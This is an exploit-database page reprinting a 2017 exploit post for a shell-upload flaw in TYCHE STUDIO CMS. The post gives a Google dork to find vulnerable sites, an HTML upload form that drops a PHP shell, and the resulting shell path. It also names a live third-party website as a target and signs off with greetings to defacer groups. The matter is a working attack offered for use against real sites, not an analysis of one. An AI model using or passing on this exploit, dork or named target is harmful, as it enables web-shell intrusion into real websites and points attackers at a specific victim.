Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-XXXX-XXXX | CWE-XX | Not specified | Not specified |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | Not specified | Remote | 2017-05-12 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
TYCHE STUDIO CMS Shell Upload Vulnerability CSRF ################################################################################# # TYCHE STUDIO CMS Shell Upload Vulnerability | CSRF # Author : Berandal # Google Dork: intext:"TYCHE STUDIO" # Tested on: Win 7, Linux # Blog : http://www.maxteroit.com/ ################################################################################# +-+-+-+-+-+-+-+-+ |B|e|r|a|n|d|a|l| +-+-+-+-+-+-+-+-+ # [!] Exploit : http://127.0.0.1/vehiculo_photos/server/php/ # [!] File Location : http://127.0.0.1/vehiculo_photos/server/php/files/shell.php ################################################################################# #CSRF: ################################################################################# <html> <body> <form enctype="multipart/form-data" action="127.0.0.1/vehiculo_photos/server/php/" method="post"> Your File: <input name="files[]" type="file" /><br /> <input type="submit" value="SIKAT!" /> </form> </body> </html> ################################################################################# # Live Target : http://centrodepiezas.es/vehiculo_photos/server/php/ ################################################################################# # ABOUT: # Facebook: https://www.facebook.com/owlsquad.id # Twitter: https://www.twitter.com/id_berandal # Greetz : All Official Member OWL SQUAD - 6host Party Coder's - Alone Clown Security # All Indonesian Defacer. #################################################################################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.